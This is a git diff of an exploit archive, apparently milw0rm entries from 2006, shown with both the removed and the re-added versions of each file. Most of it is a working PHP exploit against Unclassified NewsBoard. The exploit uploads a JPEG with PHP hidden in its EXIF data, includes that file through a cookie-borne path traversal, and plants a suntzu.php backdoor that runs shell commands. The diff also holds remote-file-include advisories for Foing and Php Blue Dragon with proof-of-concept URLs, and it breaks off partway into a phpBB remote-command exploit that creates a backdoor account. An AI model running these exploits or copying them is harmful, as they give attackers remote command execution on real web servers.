-chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00); - -/* -this image has this code inside as EXIF metadata content -<?php -$fp=fopen("suntzu.php","w"); -fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>"); -fclose($fp); -chmod("suntzu.php",777); -?> -*/ - -$data='-----------------------------7d614f2d12043e -Content-Disposition: form-data; name="action" - -edit ------------------------------7d614f2d12043e -Content-Disposition: form-data; name="id" - -'.$id.' ------------------------------7d614f2d12043e -Content-Disposition: form-data; name="cat" - -postoptions ------------------------------7d614f2d12043e -Content-Disposition: form-data; name="Signature" - - ------------------------------7d614f2d12043e -Content-Disposition: form-data; name="avatar" - -1 ------------------------------7d614f2d12043e -Content-Disposition: form-data; name="avatarfile"; filename="suntzu.jpeg" -Content-Type: image/pjpeg - -'.$shell.' ------------------------------7d614f2d12043e -Content-Disposition: form-data; name="avatarurl" - - ------------------------------7d614f2d12043e -Content-Disposition: form-data; name="photofile"; filename="suntzoi.jpeg" -Content-Type: image/pjpeg - -'.$shell.' 
------------------------------7d614f2d12043e -Content-Disposition: form-data; name="photourl" - - ------------------------------7d614f2d12043e -Content-Disposition: form-data; name="photo" - -1 ------------------------------7d614f2d12043e -Content-Disposition: form-data; name="Save" - -Save ------------------------------7d614f2d12043e-- -'; - -$packet ="POST ".$p."forum.php?req=cp HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d614f2d12043e\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Keep-Alive\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Cookie: ".$cookie."\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); - -echo "step 3 -> try to include avatar or photo...\r\n"; -$xpl=array( - urlencode("../../upload/avatar_".$id.".jpeg".chr(0x00)), - urlencode("../../upload/photo_".$id.".jpeg".chr(0x00)) - ); - -for ($i=0; $i<=count($xpl)-1; $i++) -{ - $packet ="GET ".$p."unb_lib/abbc.css.php HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: ABBC[Config][smileset]=".$xpl[$i]."; \r\n"; //pass evil var through cookies - $packet.="Connection: Close\r\n\r\n"; - $packet.=$data; - #debug - #echo quick_dump($packet); - sendpacketii($packet); -} - -echo "step 4 -> Launch commands...\r\n"; -$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=".$cmd.";\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"56789")) -{ - echo "Exploit succeeded..."; - $temp=explode("56789",$html); - die("\r\n".$temp[1]."\r\n"); -} -//if you are here... 
-echo "Exploit failed..."; -?> - -# milw0rm.com [2006-05-11] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary\r\n"; +echo "local inclusion\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; +echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n"; + +/* +1.5.3 patch level 4 and below, exploit is a bit different, ex: + +http://[target]/[path]/bb_lib/abbc.css.php?design_path=../../../../../../../../../etc/passwd%00 +*/ + +if ($argc<6) { +echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to UNB\r\n"; +echo "cmd: a shell command\r\n"; +echo "user/pass: you need a valid user account to upload files\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /unb/ your_username password cat ./../board.conf.php\r\n"; +echo "php ".$argv[0]." localhost /unb/ your_username password ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n"; +die; +} + +/* software site: http://newsboard.unclassified.de/ + + description: "The Unclassified NewsBoard (short UNB) is an open-source, + PHP-based internet bulletin board system" + + vulnerable code in unb_lib/abbc.conf.php at lines 635-641: + + ... + // Smiley Definitions + if ($ABBC['Config']['smileset']) + { + $ABBC['Config']['smilepath'] = dirname(__FILE__) . '/designs/_smile/' . $ABBC['Config']['smileset'] . '/'; + $ABBC['Config']['smileurl'] = $UNB['LibraryURL'] . 'designs/_smile/' . $ABBC['Config']['smileset'] . '/'; + @include($ABBC['Config']['smilepath'] . 'config.php'); + } + ... + + $ABBC['Config']['smileset'] var is not initialized before to be used to include + files. 
You cannot have access to this code directly but in unb_lib/abbc.css.php + at line 16 we have: + + ... + require('abbc.conf.php'); + ... + + this script is not protected by the unb_lib folder .htaccess file: + + # Don't allow direct PHP requests in this directory + <Files *.inc.php> + Order allow,deny + Deny from all + </Files> + <Files *.lib.php> + Order allow,deny + Deny from all + </Files> + + so, if register_globals = On & magic_quotes_gpc = Off, you can include files + from local resources, poc: + + http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../../../../../../../../etc/passwd%00 + http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/avatar_[user_id].jpeg%00&cmd=ls%20-la + http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/photo_[user_id].jpeg%00&cmd=ls%20-la + + this script try to include an avatar or photo with malicious php code + inside, you need a valid account to upload files + + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to 
".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; + +} + +$host=$argv[1]; +$path=$argv[2]; +$username=$argv[3]; +$pass=$argv[4]; +$cmd="";$port=80;$proxy=""; +for ($i=5; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "step 0 -> check if suntzu.php is already installed...\r\n"; +$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: cmd=".$cmd.";\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +if (strstr($html,"56789")) +{ + echo "Exploit succeeded..."; + $temp=explode("56789",$html); + die("\r\n".$temp[1]."\r\n"); +} + +echo "step 1 -> login...\r\n"; +$data ="LoginName=".urlencode(trim($username)); +$data.="&LoginPassword=".urlencode(trim($pass)); +$packet="POST ".$p."forum.php?req=setuser&module=main HTTP/1.0\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +$temp=explode("Set-Cookie: ",$html); +$temp2=explode(' ',$temp[1]); +$cookie=$temp2[0]; +$temp2=explode(' ',$temp[2]); 
+$cookie.=" ".$temp2[0]; +echo 'Your cookie: '.$cookie."\r\n"; +$temp=explode("=",$cookie); +$temp2=explode("+",$temp[2]); +$id=$temp2[0]; +echo "User Id -> ".$id."\r\n"; + +echo "step 2 -> upload a malicious avatar with php code inside...\r\n"; +$shell= +chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f). +chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70). +chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22). +chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70). +chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29). +chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73). +chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f). +chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f). +chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74). +chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73). +chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f). +chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29). +chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74). +chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71). +chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70). +chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24). +chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b). +chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72). +chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65). +chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f). +chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d). 
+chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20). +chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61). +chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c). +chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45). +chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65). +chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38). +chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d). +chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28). +chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63). +chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75). +chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70). +chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d). +chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a). +chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00). +chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00). +chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01). 
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff). +chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01). +chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03). +chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08). +chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4). +chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00). +chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03). +chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f). 
+chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00); + +/* +this image has this code inside as EXIF metadata content +<?php +$fp=fopen("suntzu.php","w"); +fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>"); +fclose($fp); +chmod("suntzu.php",777); +?> +*/ + +$data='-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="action" + +edit +-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="id" + +'.$id.' +-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="cat" + +postoptions +-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="Signature" + + +-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="avatar" + +1 +-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="avatarfile"; filename="suntzu.jpeg" +Content-Type: image/pjpeg + +'.$shell.' +-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="avatarurl" + + +-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="photofile"; filename="suntzoi.jpeg" +Content-Type: image/pjpeg + +'.$shell.' 
+-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="photourl" + + +-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="photo" + +1 +-----------------------------7d614f2d12043e +Content-Disposition: form-data; name="Save" + +Save +-----------------------------7d614f2d12043e-- +'; + +$packet ="POST ".$p."forum.php?req=cp HTTP/1.0\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d614f2d12043e\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Keep-Alive\r\n"; +$packet.="Cache-Control: no-cache\r\n"; +$packet.="Cookie: ".$cookie."\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); + +echo "step 3 -> try to include avatar or photo...\r\n"; +$xpl=array( + urlencode("../../upload/avatar_".$id.".jpeg".chr(0x00)), + urlencode("../../upload/photo_".$id.".jpeg".chr(0x00)) + ); + +for ($i=0; $i<=count($xpl)-1; $i++) +{ + $packet ="GET ".$p."unb_lib/abbc.css.php HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: ABBC[Config][smileset]=".$xpl[$i]."; \r\n"; //pass evil var through cookies + $packet.="Connection: Close\r\n\r\n"; + $packet.=$data; + #debug + #echo quick_dump($packet); + sendpacketii($packet); +} + +echo "step 4 -> Launch commands...\r\n"; +$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: cmd=".$cmd.";\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"56789")) +{ + echo "Exploit succeeded..."; + $temp=explode("56789",$html); + die("\r\n".$temp[1]."\r\n"); +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-05-11] 
diff --git a/platforms/php/webapps/1778.txt b/platforms/php/webapps/1778.txt
index cfa8338c3..564e3ed4f 100755
--- a/platforms/php/webapps/1778.txt
+++ b/platforms/php/webapps/1778.txt
@@ -1,49 +1,49 @@ -# Kurdish Security Advisory -# Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html -# Foing Remote File Include Vulnerability [PHPBB] :} -# "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdullah Ocalan -# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN ! -# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org -# Risk : High -# Class : Remote -# Script : Foing -# Script Website : http://foing.sourceforge.net/ -# Version : Foing 0.7.0 - 0.6.0 - 0.5.0 - 0.4.0 - 0.3.0 - 0.2.0 -# w0rkz : "Powered by foing" - -# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc.. - --------------------------------------------------------------------------------- - -# cmd shell example: -# cmd shell variable: ($_GET[cmd]); - -Vulnerable code : - -Get along at directory config.php - -did you meet of .. - -<?php - -define('FOING_INSTALLED', true); - -$phpbb_root_path = '../'; -$foing_prefix = $table_prefix; - -?> - -Proof Of Concept : -http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a -http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a -http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a -http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a -http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a -http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a - -# milw0rm.com [2006-05-12] +# Kurdish Security Advisory +# Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html +# Foing Remote File Include Vulnerability [PHPBB] :} +# "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." 
Abdullah Ocalan +# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN ! +# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org +# Risk : High +# Class : Remote +# Script : Foing +# Script Website : http://foing.sourceforge.net/ +# Version : Foing 0.7.0 + 0.6.0 + 0.5.0 + 0.4.0 + 0.3.0 + 0.2.0 +# w0rkz : "Powered by foing" + +# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc.. + +-------------------------------------------------------------------------------- + +# cmd shell example: +# cmd shell variable: ($_GET[cmd]); + +Vulnerable code : + +Get along at directory config.php + +did you meet of .. + +<?php + +define('FOING_INSTALLED', true); + +$phpbb_root_path = '../'; +$foing_prefix = $table_prefix; + +?> + +Proof Of Concept : +http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a +http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a +http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a +http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a +http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a +http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a + +# milw0rm.com [2006-05-12] diff --git a/platforms/php/webapps/1779.txt b/platforms/php/webapps/1779.txt index b41f657dd..99819c086 100755 --- a/platforms/php/webapps/1779.txt +++ b/platforms/php/webapps/1779.txt 
@@ -1,24 +1,24 @@ -################DEVIL TEAM THE BEST POLISH TEAM################# -#Php Blue Dragon Platinum - Remote File Include -#Find by Kacper (Rahim). -#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** -#dork: powered by Php Blue Dragon Platinum -################################################################ -[code] -// Szukanie u.ytkownika -include($vsDragonRootPath."public_includes/pub_language/".$UserSession --> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt); -[/code] - -Fix: -[code] -// Szukanie u.ytkownika -$vsDragonRootPath = "./"; -include($vsDragonRootPath."public_includes/pub_language/".$UserSession --> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt); -[/code] -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts] - -# milw0rm.com [2006-05-12] +################DEVIL TEAM THE BEST POLISH TEAM################# +#Php Blue Dragon Platinum - Remote File Include +#Find by Kacper (Rahim). +#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** +#dork: powered by Php Blue Dragon Platinum +################################################################ +[code] +// Szukanie u.ytkownika +include($vsDragonRootPath."public_includes/pub_language/".$UserSession +-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt); +[/code] + +Fix: +[code] +// Szukanie u.ytkownika +$vsDragonRootPath = "./"; +include($vsDragonRootPath."public_includes/pub_language/".$UserSession +-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt); +[/code] +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts] + +# milw0rm.com [2006-05-12] diff --git a/platforms/php/webapps/1780.php b/platforms/php/webapps/1780.php index 47ed5dec4..1d382a0fe 100755 --- a/platforms/php/webapps/1780.php 
+++ b/platforms/php/webapps/1780.php 
@@ -1,916 +1,916 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "PhpBB <= v2.0.20 \"Admin/Restore Database/default_lang remote commands execution\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n"; -echo "-> you need an admin sid, works regardless of magic_quotes_gpc settings\r\n"; -echo "tested and working against a fresh PhpBB installation\r\n\r\n"; - -if ($argc<5) { -echo "Usage: php ".$argv[0]." host path sid cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to PhpBB\r\n"; -echo "sid: session id\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 cat config.php\r\n"; -echo "php ".$argv[0]." localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / 8db5cef976c7e0f51c25c92152b56881 ls -la -P1.1.1.1:80\r\n\r\n"; -die; -} - -/* explaination: - - if you have admin session id, you can enable avatar uploads, if not activated - yet and you can store an arbitrary path for "default_lang" inside phpbb_config - database table using the "Database Restore" feature. So you can upload a - malicious avatar with php code as EXIF metadata content and submit a query like - this: - - UPDATE phpbb_config SET config_value=CONCAT("english/../../images/avatars/297984465bc277af10.jpg",CHAR(0)) where config_name="default_lang"; - - note: you can see avatar filename in profile page - - in faq.php, like in other files, near line 62, we have: - - ... - include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/' . $lang_file . '.' . $phpEx); - ... - - $board_config['default_lang'] var is not sanitized before to be used - to include files, so you can reach the malicious avatar to execute the code - inside of it. 
- - This tool also creates a "suntzu" user with password "suntzu" and a backdoor - called suntzu.php, so you do not need sid after the first run - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo 